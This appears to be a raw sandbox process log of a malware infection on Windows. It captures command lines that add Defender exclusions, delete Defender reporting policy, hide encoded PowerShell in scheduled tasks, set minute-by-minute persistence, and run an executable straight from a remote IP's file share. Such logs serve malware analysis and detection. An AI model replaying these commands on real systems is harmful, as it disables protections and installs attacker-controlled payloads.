"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\RBTDPuBvwCAQssKTg /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\RBTDPuBvwCAQssKTg /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\qkTATVOZOEOSiyaz /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\qkTATVOZOEOSiyaz /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "gmPcItwup" /SC once /ST 14:27:09 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "gmPcItwup"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
C:\Windows\system32\gpupdate.exe
"C:\Windows\system32\gpupdate.exe" /force
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
C:\Windows\system32\gpscript.exe
gpscript.exe /RefreshSystemParam
C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "gmPcItwup"
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "ZZJFebqxaSxitRKzn" /SC once /ST 06:58:33 /RU "SYSTEM" /TR "\"C:\Windows\Temp\qkTATVOZOEOSiyaz\OUlMYnQejiLZPVP\jxwpNFc.exe\" lB /YRsite_idMFl 525403 /S" /V1 /F
C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "ZZJFebqxaSxitRKzn"
C:\Windows\Temp\qkTATVOZOEOSiyaz\OUlMYnQejiLZPVP\jxwpNFc.exe
C:\Windows\Temp\qkTATVOZOEOSiyaz\OUlMYnQejiLZPVP\jxwpNFc.exe lB /YRsite_idMFl 525403 /S
C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "bPIVdqgtNzoofgavuM"
C:\Windows\SysWOW64\cmd.exe
cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:32
C:\Windows\SysWOW64\reg.exe
REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:32
C:\Windows\SysWOW64\cmd.exe
cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64
C:\Windows\SysWOW64\reg.exe
REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\IWiqTrOkU\oDZykN.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "dqbVGjTgjNKCoLN" /V1 /F
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "dqbVGjTgjNKCoLN2" /F /xml "C:\Program Files (x86)\IWiqTrOkU\iEFlgHb.xml" /RU "SYSTEM"
C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "dqbVGjTgjNKCoLN"
C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "dqbVGjTgjNKCoLN"
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "mBsLOSVuUwfJfv" /F /xml "C:\Program Files (x86)\fZMfFgxjsFJU2\JVScpiv.xml" /RU "SYSTEM"
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "bUckarULzMhli2" /F /xml "C:\ProgramData\bqYuHbIITFqKPmVB\ZBDVErO.xml" /RU "SYSTEM"
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "wjMJaUdIQxVGPBwNG2" /F /xml "C:\Program Files (x86)\LbkorXnFckOLpaAHvRR\ErUeanN.xml" /RU "SYSTEM"
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "bqibwIbjyXxqEEXembu2" /F /xml "C:\Program Files (x86)\nMsbjdmXnsxFC\njhPluj.xml" /RU "SYSTEM"
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "IgmMCWhKsLGKjacyM" /SC once /ST 00:29:15 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\qkTATVOZOEOSiyaz\nfrkEoNC\nuCIebF.dll\",#1 /mKsite_idfcu 525403" /V1 /F
C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "IgmMCWhKsLGKjacyM"
C:\Windows\system32\rundll32.EXE
C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\qkTATVOZOEOSiyaz\nfrkEoNC\nuCIebF.dll",#1 /mKsite_idfcu 525403
C:\Windows\SysWOW64\rundll32.exe
C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\qkTATVOZOEOSiyaz\nfrkEoNC\nuCIebF.dll",#1 /mKsite_idfcu 525403
C:\Windows\SysWOW64\cmd.exe
cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:32
C:\Windows\SysWOW64\reg.exe
REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:32
C:\Windows\SysWOW64\cmd.exe
cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:64
C:\Windows\SysWOW64\reg.exe
REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:64
C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "ZZJFebqxaSxitRKzn"
C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "IgmMCWhKsLGKjacyM"
C:\Users\Admin\AppData\Local\Temp\jsmpdfixntgalfjwtuf.exe
"C:\Users\Admin\AppData\Local\Temp\jsmpdfixntgalfjwtuf.exe"
C:\Users\Admin\AppData\Local\Temp\odspxhsojhsrcnhepqd.exe
"C:\Users\Admin\AppData\Local\Temp\odspxhsojhsrcnhepqd.exe"
C:\Users\Admin\AppData\Local\Temp\b64c58644b\Utsysc.exe
"C:\Users\Admin\AppData\Local\Temp\b64c58644b\Utsysc.exe"
C:\Users\Admin\AppData\Local\Temp\hlieequfbakhoolq.exe
"C:\Users\Admin\AppData\Local\Temp\hlieequfbakhoolq.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\s51s.0.bat" "
C:\Windows\SysWOW64\timeout.exe
timeout 3
C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN Utsysc.exe /TR "C:\Users\Admin\AppData\Local\Temp\b64c58644b\Utsysc.exe" /F
C:\Users\Admin\AppData\Local\Temp\1000078001\hv.exe
"C:\Users\Admin\AppData\Local\Temp\1000078001\hv.exe"
C:\ProgramData\pinterests\XRJNZC.exe
"C:\ProgramData\pinterests\XRJNZC.exe"
C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /sc MINUTE /mo 1 /RL HIGHEST /tn "XRJNZC" /tr C:\ProgramData\pinterests\XRJNZC.exe /f
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://www.ammyy.com/?lang=en&page=buy.html
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x120,0x124,0x128,0xfc,0x12c,0x7ffb998346f8,0x7ffb99834708,0x7ffb99834718
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2148,9603967266687263428,2319334505721713920,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2608 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2148,9603967266687263428,2319334505721713920,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2228 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2148,9603967266687263428,2319334505721713920,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2176 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,9603967266687263428,2319334505721713920,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3200 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,9603967266687263428,2319334505721713920,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3188 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,9603967266687263428,2319334505721713920,131072 --lang=en-US --extension-process --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3756 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,9603967266687263428,2319334505721713920,131072 --lang=en-US --extension-process --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4504 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,9603967266687263428,2319334505721713920,131072 --lang=en-US --extension-process --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4364 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,9603967266687263428,2319334505721713920,131072 --lang=en-US --extension-process --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4292 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,9603967266687263428,2319334505721713920,131072 --lang=en-US --extension-process --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4084 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,9603967266687263428,2319334505721713920,131072 --lang=en-US --extension-process --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3636 /prefetch:1
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,9603967266687263428,2319334505721713920,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5884 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2148,9603967266687263428,2319334505721713920,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5852 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --configure-user-settings --verbose-logging --system-level --msedge --force-configure-user-settings
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\MsEdgeCrashpad --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x248,0x24c,0x250,0x224,0x254,0x7ff6c7775460,0x7ff6c7775470,0x7ff6c7775480
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,9603967266687263428,2319334505721713920,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3200 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,9603967266687263428,2319334505721713920,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6680 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,9603967266687263428,2319334505721713920,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6000 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,9603967266687263428,2319334505721713920,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5780 /prefetch:1
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 8436 -ip 8436
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 8436 -s 1532
C:\Users\Admin\AppData\Local\Temp\b64c58644b\Utsysc.exe
C:\Users\Admin\AppData\Local\Temp\b64c58644b\Utsysc.exe
C:\ProgramData\pinterests\XRJNZC.exe
C:\ProgramData\pinterests\XRJNZC.exe
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,9603967266687263428,2319334505721713920,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6680 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=2148,9603967266687263428,2319334505721713920,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2272 /prefetch:8
C:\Users\Admin\AppData\Local\Temp\b64c58644b\Utsysc.exe
C:\Users\Admin\AppData\Local\Temp\b64c58644b\Utsysc.exe
C:\ProgramData\pinterests\XRJNZC.exe
C:\ProgramData\pinterests\XRJNZC.exe
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffb998346f8,0x7ffb99834708,0x7ffb99834718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2208,16931134321098190933,16403902932469870216,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2272 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2208,16931134321098190933,16403902932469870216,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2220 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2208,16931134321098190933,16403902932469870216,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2912 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2208,16931134321098190933,16403902932469870216,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3528 /prefetch:1
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2208,16931134321098190933,16403902932469870216,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3336 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2208,16931134321098190933,16403902932469870216,131072 --lang=en-US --extension-process --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3988 /prefetch:1
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2208,16931134321098190933,16403902932469870216,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3784 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2208,16931134321098190933,16403902932469870216,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5000 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2208,16931134321098190933,16403902932469870216,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5512 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2208,16931134321098190933,16403902932469870216,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=5520 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2208,16931134321098190933,16403902932469870216,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5904 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2208,16931134321098190933,16403902932469870216,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5904 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2208,16931134321098190933,16403902932469870216,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6032 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2208,16931134321098190933,16403902932469870216,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6104 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2208,16931134321098190933,16403902932469870216,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6092 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2208,16931134321098190933,16403902932469870216,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4172 /prefetch:8
C:\Users\Admin\AppData\Local\Temp\b64c58644b\Utsysc.exe
C:\Users\Admin\AppData\Local\Temp\b64c58644b\Utsysc.exe
C:\ProgramData\pinterests\XRJNZC.exe
C:\ProgramData\pinterests\XRJNZC.exe
C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\2023-11-23-11\" -spe -an -ai#7zMap14863:88:7zEvent14707
\??\UNC\62.173.141.116\scarica\paypal_inv.exe
"\\62.173.141.116\scarica\paypal_inv.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2208,16931134321098190933,16403902932469870216,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6220 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2208,16931134321098190933,16403902932469870216,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5672 /prefetch:1
C:\Users\Admin\Downloads\2023-11-23-11\3c47f28be9b0985a64ec458337ff217346a69d670cdc582f6813f32e8d75ed52.exe
